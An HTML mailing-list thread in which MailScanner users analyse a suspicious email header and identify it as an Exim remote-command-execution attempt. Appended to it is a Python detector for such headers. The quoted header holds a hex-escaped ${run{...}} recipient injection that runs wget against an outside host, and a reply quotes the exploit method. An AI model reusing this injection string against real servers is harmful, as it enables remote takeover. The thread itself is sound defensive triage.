<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
</head>
<body text="#000000" bgcolor="#FFFFFF">
<pre class=" language-txt"><code class=" language-txt" style="white-space: pre-wrap;">Yes, I think you're right :-D
it looks very similar to this:
- If Exim was configured to recognize tags in the local part of the
recipient's address (via "local_part_suffix = +* : -*" for example),
then a remote attacker can simply reuse our local-exploitation method
with an RCPT TO "<b>balrog+${run{...}}@</b>localhost" (where "balrog" is the
name of a local user).</code></pre>
<br>
Source: <a class="moz-txt-link-freetext" href="https://www.exploit-db.com/exploits/46974">https://www.exploit-db.com/exploits/46974</a><br>
<br>
Phew... my MailScanner can live on...<br>
<br>
Thank you!<br>
<br>
<pre class="moz-signature" cols="72">Kind regards
H. Backhaus
Fink-Computer Systeme
Heggrabenstr. 9, 35435 Wettenberg
Email: <a class="moz-txt-link-abbreviated" href="mailto:heino.backhaus@fink-computer.de">heino.backhaus@fink-computer.de</a>
Web: <a class="moz-txt-link-abbreviated" href="http://www.fink-computer.de">www.fink-computer.de</a>
Fax: +49-641-98444638
Phone: +49-641-98444640
VAT ID: DE151040770
HRB: 2143 Gießen
Managing director: Fredi Fink
I was gratified to be able to answer promptly, and I did.
I said I didn't know.
Mark Twain
</pre>
<div class="moz-cite-prefix">On 15.07.2019 at 13:16, Shawn
Iverson via MailScanner wrote:<br>
</div>
<blockquote type="cite"
cite="mid:CABu_8z+7=DmqQ5Lz2dBqJKMz72odUMW1kwBDuqNY59V4p2M6XA@mail.gmail.com">
<div dir="ltr">Agreed.</div>
<br>
<div class="gmail_quote">
<div dir="ltr" class="gmail_attr">On Mon, Jul 15, 2019 at 7:14
AM Martin Hepworth &lt;<a href="mailto:maxsec@gmail.com"
moz-do-not-send="true">maxsec@gmail.com</a>&gt; wrote:<br>
</div>
<blockquote class="gmail_quote" style="margin:0px 0px 0px
0.8ex;border-left:1px solid rgb(204,204,204);padding-left:1ex">
<div>
<div dir="auto">Looks like an attempt at the Exim
vulnerability exploitation rather than mailscanner</div>
</div>
<div><br>
<div class="gmail_quote">
<div dir="ltr" class="gmail_attr">On Mon, 15 Jul 2019 at
11:59, Heino Backhaus &lt;<a
href="mailto:heino.backhaus@fink-computer.de"
target="_blank" moz-do-not-send="true">heino.backhaus@fink-computer.de</a>&gt;
wrote:<br>
</div>
<blockquote class="gmail_quote" style="margin:0px 0px 0px
0.8ex;border-left:1px solid
rgb(204,204,204);padding-left:1ex">
<div bgcolor="#FFFFFF"> Hello list,<br>
<br>
I need some help analysing the following email I
received last week.<br>
<br>
Mailwatch Mail-Metadata:<br>
<br>
Received: from <a href="http://sab.com"
target="_blank" moz-do-not-send="true">sab.com</a>
(unknown [46.22.132.94])<br>
by mailscanner.mydomain.local (Postfix) with SMTP
id D3F551005AD<br>
for &lt;root+${run{x2fbinx2fsht-ctx22wgetx20<b>1.2.3.4</b>x2fsbzx2f<b>5.6.7.8</b><a
class="gmail-m_-4713894618235700781m_-5282560356877763242moz-txt-link-abbreviated"
href="mailto:x22%7D%7D@mailscanner.mydomain.local"
target="_blank" moz-do-not-send="true">x22}}@mailscanner.mydomain.local</a>&gt;;
Thu, 11 Jul 2019 19:34:58 +0200 (CEST)<br>
Received: 1<br>
Received: 2<br>
Received: 3<br>
Received: 4<br>
Received: 5<br>
Received: 6<br>
Received: 7<br>
Received: 8<br>
Received: 9<br>
Received: 10<br>
Received: 11<br>
Received: 12<br>
Received: 13<br>
Received: 14<br>
Received: 15<br>
Received: 16<br>
Received: 17<br>
Received: 18<br>
Received: 19<br>
Received: 20<br>
Received: 21<br>
Received: 22<br>
Received: 23<br>
Received: 24<br>
Received: 25<br>
Received: 26<br>
Received: 27<br>
Received: 28<br>
Received: 29<br>
Received: 30<br>
Received: 31<br>
<br>
<br>
<br>
IP1: <b>199.204.214.40</b> changed to <b>1.2.3.4</b>
to disarm this...just in case...<br>
IP2: <b>87.138.227.107</b> changed to <b>5.6.7.8</b>
to disarm this...just in case...<br>
<br>
Versions:<br>
MailWatch Version: 1.2.9<br>
OS: Ubuntu 16.04.6 LTS (Xenial Xerus)<br>
Postfix Version: 3.1.0 <br>
MailScanner Version: 5.1.2<br>
ClamAV Version: 0.102.0-devel-20190715 <br>
SpamAssassin Version: 3.4.2 <br>
PHP Version: 5.6.40-8+ubuntu16.04.1+<a
href="http://deb.sury.org" target="_blank"
moz-do-not-send="true">deb.sury.org</a>+1<br>
MySQL Version: 5.7.26-0ubuntu0.16.04.1<br>
<br>
Can you help me bring some light into this darkness...<br>
</div>
<div bgcolor="#FFFFFF"> <br>
--
<br>
This e-mail was scanned for viruses and dangerous attachments
<br>
by
<a href="http://www.mailscanner.info/" target="_blank"
moz-do-not-send="true"><b>MailScanner</b></a>
and is probably virus-free.
</div>
<br>
<br>
-- <br>
MailScanner mailing list<br>
<a href="mailto:mailscanner@lists.mailscanner.info"
target="_blank" moz-do-not-send="true">mailscanner@lists.mailscanner.info</a><br>
<a
href="http://lists.mailscanner.info/mailman/listinfo/mailscanner"
rel="noreferrer" target="_blank"
moz-do-not-send="true">http://lists.mailscanner.info/mailman/listinfo/mailscanner</a><br>
<br>
</blockquote>
</div>
</div>
-- <br>
<div dir="ltr"
class="gmail-m_-4713894618235700781gmail_signature">-- <br>
Martin Hepworth, CISSP<br>
Oxford, UK</div>
<br>
<br>
<br>
</blockquote>
</div>
<br clear="all">
<div><br>
</div>
-- <br>
<div dir="ltr" class="gmail_signature">Shawn Iverson, CETL
<div>Director of Technology</div>
<div>Rush County Schools</div>
<div>765-932-3901 option 7</div>
<div><a href="mailto:iversons@rushville.k12.in.us" target="_blank" moz-do-not-send="true">iversons@rushville.k12.in.us</a></div>
</div>
<br>
</blockquote>
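<br>
Added example (not part of the original thread, and not MailScanner or Exim code): a small Python triage helper that flags the two things visible in the header quoted above, an Exim <code>${run{...}}</code>-style expansion inside a recipient's local part and bare numbered <code>Received:</code> lines. The sample messages, <code>mx.example</code>, <code>192.0.2.10</code> and the placeholder command are constructed, and the code assumes the <code>\x2f</code>-style escapes arrive with their backslashes intact, which the header as displayed above does not show.<br>

```python
import re

# Envelope address as it appears in a Received "for <...>" clause, a Postfix
# "to=<...>" log field, or an SMTP "RCPT TO:<...>" line.
ADDR = re.compile(r"(?:\bfor\s+|to=|RCPT TO:\s*)<([^<>]+)>", re.I)
# Exim string-expansion item opening, e.g. ${run{...}}.
EXPANSION = re.compile(r"\$\{\s*(\w+)\s*\{")
HEX_ESC = re.compile(r"\\x([0-9a-fA-F]{2})")
# "Received: 1", "Received: 2", ... as seen in the sample on this page.
BARE_RECEIVED = re.compile(r"^Received:[ \t]*\d+[ \t]*$", re.I | re.M)


def decode_escapes(text):
    """Render \\xNN and \\t escapes readable so an analyst can see the command."""
    text = HEX_ESC.sub(lambda m: chr(int(m.group(1), 16)), text)
    return text.replace("\\t", " ")


def triage(message):
    """Return a list of findings for one message's headers or log excerpt."""
    findings = []
    for addr in ADDR.findall(message):
        local = addr.rsplit("@", 1)[0]
        for m in EXPANSION.finditer(local):
            findings.append({
                "indicator": "expansion-in-local-part",
                "item": m.group(1).lower(),
                "address": addr,
                "decoded": decode_escapes(local),
            })
    bare = len(BARE_RECEIVED.findall(message))
    if bare:
        findings.append({"indicator": "bare-numbered-received", "count": bare})
    return findings


# Constructed samples: inert placeholder command, documentation IP range.
SAMPLE_HOSTILE = (
    "Received: from mx.example (unknown [192.0.2.10])\n"
    "\tby mailscanner.mydomain.local (Postfix) with SMTP id 0000000000\n"
    "\tfor <root+${run{\\x2fbin\\x2fecho\\x20placeholder}}"
    "@mailscanner.mydomain.local>;\n"
    + "".join(f"Received: {n}\n" for n in range(1, 32))
)
SAMPLE_BENIGN = (
    "Received: from mx.example (unknown [192.0.2.10])\n"
    "\tfor <alice+lists@mailscanner.mydomain.local>;\n"
)

if __name__ == "__main__":
    for finding in triage(SAMPLE_HOSTILE):
        print(finding)
```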
<br>
</body>
</html>